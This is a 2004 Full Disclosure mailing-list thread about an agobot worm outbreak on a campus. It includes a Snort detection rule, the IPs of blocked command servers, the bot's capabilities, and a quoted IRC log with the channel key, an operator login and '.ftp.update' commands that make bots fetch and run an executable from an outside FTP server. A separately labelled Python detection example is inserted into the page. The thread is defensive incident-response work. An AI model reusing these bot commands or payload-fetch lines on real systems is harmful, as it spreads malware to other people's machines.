Full Disclosure mailing list archives
RE: Re: Outbreak of a virus on campus
From: "David Hale" <ddh () mtu edu>
Date: Sun, 25 Apr 2004 02:52:09 -0400 (EDT)
We have currently blocked connections to/from port 7000 on the following hosts:

130.74.82.206
131.234.100.43
193.87.20.31

This seems to have contained the spread of the worm within our campus. The list of hosts was gathered with a snort signature of:

alert tcp $HOME_NET any -> any 7000 (msg:"agobot IRC traffic"; content:"weednet"; classtype:bad-unknown; sid:71727; rev:1;)

Until the block was in place we had shut down around 50 hosts (mainly on our dorm network) that had been infected with the worm.

-Dave Hale
Sr. Security Specialist
Michigan Technological University
----- Original Message -----
From: "Morning Wood"
Date: Sat, 24 Apr 2004 18:37:31 +0000
To: mueller () fidnet com, full-disclosure () lists netsys com
Subject: RE: [Full-disclosure] Re: Outbreak of a virus on campus

phatbot?

This one is yet another agobot. Has a long list of useful commands (included at the end of the posting, if someone is interested...), polymorph capability, stealth capability - hides its own process in memory and binary from listing, capable of updating itself via ftp/http, has a list of servers for evaluating connection speed, steals cdkeys, sniffs a wire, performs ddos, capable of installing a proxy, sends spam via aol, can install identd, has a LONG list of various processes to kill (mostly AV, but also regedit and tcpview among others), retrieves sysinfo, makes screenshots etc etc etc - looks similar to other good household bots :)

What makes it interesting - its stealth capability and propagation. It has the following scanning/propagation subroutines:

CScannerBagle
CScannerBase
CScannerDCOM
CScannerDoom
CScannerDW
CScannerHTTP
CScannerNetBios
CScannerOptix
CScannerSQL
CScannerUPNP
CScannerWKS

When the worm is started, it connects to irc server 193.87.20.31 (irc.weednet.net) port 7000. Then it joins the password protected channel #1337, password is heyho. As the channel topic is .scan.startall, it accepts the command and starts scanning right away.

I took my trusty irc client and joined that channel myself. Right away admin gave me those commands:

<admin> .login stebo jamesbond007 -s
<admin> .ftp.update ftp://ftp:bla () ftp uni-freiburg de/incoming/dt.exe %TEMP%\xgf.exe BLAOR12
<admin> .scan.stop
<admin> .ftp.update ftp://ftp:bla () ftp uni-freiburg de/incoming/dt.exe c:\xgf.exe BLAOR12

seems like my 'bot' version was too old :)

have fun :)

W.

-----------------------
commands and parameters
all commands start with . (dot)
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
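The Snort rule in Dave Hale's post and the IRC behaviour described in the quoted reply (server 193.87.20.31 on port 7000, channel #1337 with key heyho, topic .scan.startall, dot-prefixed operator commands) can be checked against traffic offline. The following Python is an added example, not code from either poster or from any Snort release: it re-implements the rule's match semantics over a few constructed TCP payload records, derives the infected-host and block lists the way the post describes, and pulls the IRC channel/key/topic/commands out of matching payloads for triage. The record layout, the HOME_NET value and every sample payload are assumptions made for the example.

```python
"""Re-implementation of the quoted Snort rule over constructed records.

Rule being emulated (from the thread):
  alert tcp $HOME_NET any -> any 7000 (msg:"agobot IRC traffic";
        content:"weednet"; classtype:bad-unknown; sid:71727; rev:1;)
"""
import ipaddress
from dataclasses import dataclass

HOME_NET = ipaddress.ip_network("141.219.0.0/16")  # assumed campus range


@dataclass
class TcpRecord:
    """One direction of a TCP flow: assumed layout, not a Snort structure."""
    src: str
    dst: str
    dport: int
    payload: bytes


def rule_matches(rec: TcpRecord) -> bool:
    """Match semantics of the rule: source inside $HOME_NET, any source
    port, any destination, destination port 7000, and the literal bytes
    'weednet' somewhere in the payload (content: is case-sensitive
    unless 'nocase' is given, which the rule does not use)."""
    return (ipaddress.ip_address(rec.src) in HOME_NET
            and rec.dport == 7000
            and b"weednet" in rec.payload)


def matching_records(records):
    return [r for r in records if rule_matches(r)]


def infected_hosts(records):
    """Campus hosts that tripped the rule (the ~50 machines to shut down)."""
    return sorted({r.src for r in matching_records(records)})


def block_list(records):
    """Remote IRC servers to block on port 7000, as done in the post."""
    return sorted({r.dst for r in matching_records(records)})


def irc_hints(payload: bytes) -> dict:
    """Extract IRC triage details: JOIN channel/key, topic (332 reply or
    TOPIC), and dot-prefixed bot commands seen in PRIVMSG text."""
    hints = {}
    for raw in payload.split(b"\r\n"):
        line = raw.decode("latin-1").strip()
        if not line:
            continue
        if line.startswith(":"):            # optional ":prefix " before the command
            _, _, line = line.partition(" ")
        cmd, _, rest = line.partition(" ")
        cmd = cmd.upper()
        if cmd == "JOIN":
            chan, _, key = rest.partition(" ")
            hints["channel"] = chan
            if key:
                hints["key"] = key
        elif cmd in ("332", "TOPIC"):
            hints["topic"] = rest.split(":", 1)[1] if ":" in rest else rest
        elif cmd == "PRIVMSG":
            text = rest.split(":", 1)[1] if ":" in rest else ""
            if text.startswith("."):
                hints.setdefault("commands", []).append(text)
    return hints


# Constructed sample traffic (not captured data). Only records 0 and 1 fire:
# record 2 is on port 6667, record 3 is not from HOME_NET, record 4 never
# carries the 'weednet' string even though it joins the bot channel.
SAMPLE = [
    TcpRecord("141.219.50.12", "193.87.20.31", 7000,
              b"NICK xgf12345\r\nUSER xgf 0 * :xgf\r\n"
              b"PONG :irc.weednet.net\r\nJOIN #1337 heyho\r\n"),
    TcpRecord("141.219.61.7", "130.74.82.206", 7000, b"PONG :irc.weednet.net\r\n"),
    TcpRecord("141.219.50.12", "193.87.20.31", 6667, b"PONG :irc.weednet.net\r\n"),
    TcpRecord("10.1.1.5", "193.87.20.31", 7000, b"PONG :irc.weednet.net\r\n"),
    TcpRecord("141.219.70.3", "131.234.100.43", 7000, b"JOIN #1337 heyho\r\n"),
]

# Constructed server-to-bot traffic, for the hint extractor only.
SERVER_SIDE = (b":irc.weednet.net 332 xgf12345 #1337 :.scan.startall\r\n"
               b":admin!a@b PRIVMSG #1337 :.scan.stop\r\n")

if __name__ == "__main__":
    print("infected:", infected_hosts(SAMPLE))
    print("block   :", block_list(SAMPLE))
    for r in matching_records(SAMPLE):
        print(r.src, "->", r.dst, irc_hints(r.payload))
    print("server  :", irc_hints(SERVER_SIDE))
```

The last sample record is the caveat a practitioner should keep in mind: the rule keys on the string "weednet", so a bot talking to a server whose name never appears in the client-side payload (or a server at another port) is missed even though it joins #1337 with the published key. Pairing the content match with a JOIN/TOPIC check, as irc_hints does, gives a second signal for the hosts the rule alone does not list.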
Current thread:
- Re: Outbreak of a virus on campus RMueller (Apr 24)
- <Possible follow-ups>
- RE: Re: Outbreak of a virus on campus Morning Wood (Apr 24)
- RE: Re: Outbreak of a virus on campus Willem Koenings (Apr 24)
- RE: Re: Outbreak of a virus on campus David Hale (Apr 25)
- RE: Re: Outbreak of a virus on campus David Hale (Apr 25)
- RE: Re: Outbreak of a virus on campus David Hale (Apr 25)